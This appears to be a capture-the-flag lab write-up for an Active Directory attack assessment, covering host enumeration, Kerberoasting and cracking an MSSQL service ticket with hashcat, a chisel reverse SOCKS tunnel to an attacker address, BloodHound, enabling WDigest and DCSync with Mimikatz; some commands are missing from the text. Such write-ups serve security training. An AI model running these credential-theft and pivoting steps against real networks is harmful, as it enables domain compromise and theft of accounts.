AD Enumeration & Attacks - Skills Assessment Part I
We already have these credentials ('admin:My_W3bsH3ll_P@ssw0rd!') in place, allowing us to start from the /uploads directory.
This write-up does not contain any credentials. I've provided all the commands and explanations and you need to execute them on your own.
Questions and response
1-Submit the contents of the flag.txt file on the administrator Desktop of the web server
First, I perform a simple enumeration by identifying users on the target host using the following command:
net user
result:
Administrator DefaultAccount Guest
WDAGUtilityAccount
i want also determine the hostname of my target machine
PS> hostname
WEB-WIN01
get information about the system machine and the domain name
PS> systeminfo
Host Name: WEB-WIN01
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00430-10710-91142-AA408
Original Install Date: 3/30/2022, 2:27:04 AM
System Boot Time: 3/16/2024, 5:05:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,160 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,388 MB
Virtual Memory: In Use: 1,043 MB
Page File Location(s): C:\pagefile.sys
Domain: INLANEFREIGHT.LOCAL
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB4578966
[02]: KB4464455
Network Card(s): 2 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.197.134
[02]: fe80::4cec:af88:cdc7:54bd
[03]: dead:beef::4cec:af88:cdc7:54bd
[04]: dead:beef::1fe
[02]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet1
DHCP Enabled: No
IP address(es)
[01]: 172.16.6.100
[02]: fe80::adb5:8ffa:2424:3d64
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
get information about domain
PS>[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
Forest : INLANEFREIGHT.LOCAL
CurrentTime : 3/17/2024 2:20:08 AM
HighestCommittedUsn : 65655
OSVersion : Windows Server 2019 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : INLANEFREIGHT.LOCAL
IPAddress : 172.16.6.3
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : DC01.INLANEFREIGHT.LOCAL
Partitions : {DC=INLANEFREIGHT,DC=LOCAL, CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL...}
2-Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
So, first, we need to enumerate SPN accounts with the following command:
And then the Kerberos ticket has been saved in memory. To confirm, you can use 'klist'. Now, we need to extract it. I'll attempt to do so using Mimikatz with the following command:
c:\mimikatz.exe "kerberos::list /export" exit
And it didn't work so i switch using Rebus and it worked."
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400F, 2639/5342 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433@INLANEFREIGHT.LOCAL*$216c085da9fc106eae92301453a63062$9d816b1ef670f3ae7753d19ce01a433b28fc14c8d8a6e04daa102374a4###":####
Don't attempt to crack other TGS tickets it won't work xD.
4-Submit the contents of the flag.txt file on the Administrator desktop on MS01
I first use ping to test the connection and verify if MS01 is available as well as to determine its IP address.
PS> ping MS01
Pinging MS01.INLANEFREIGHT.LOCAL [172.16.6.50] with 32 bytes of data:
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.6.50:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
let's use credential of SPN we found
Now let's use nc.exe on WEB-WIN01 to establish a stable shell and i will utilize Chisel as a proxy on it to forward all my requests to the internal network of the domain from my Kali machine. You can achieve this using the following commands:
chisel server -p 8000 --reverse #in kali side
c:\chisel.exe client 10.10.15.79:8001 R:socks #in target side
And then I use CrackMapExec with the credentials of the user 'svc_sql' on the IP address of MS01:
But I only found a blank password. So, I extracted the Kerberos ticket of that user and attempted to crack it, but it didn't work despite trying several methods. I even attempted to crack the NT hash, but that also failed. After further research, I discovered that I needed to enable "WDigest". For more details, check the post I provided. Here's the command:
I'm now attempting to use BloodHound. First i downloaded SharpHound onto MS01 using Evil-WinRM, and then I executed it with the following command:
ShapHound.exe -c ALL --zipfilename enum
And then I extracted the zip file on my Kali machine and used the BloodHound GUI. Here's what I found:
so the response is DCync.
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
So our compromised user 'TPETTY' can perform DCsync to the domain controller. Now, we just need to determine the IP address of the DC which was gathered in the previous question. In my case i attempted to do this using Mimikatz but first i need to authenticate as that user.
"Here, it took a lot of time because I didn't pay attention to something very important. I hope you'll discover it, if not, don't worry I'll recommend you to read this First, I download Mimikatz onto the target machine using Evil-WinRM, and then execute Mimikatz to dump any credentials in memory.
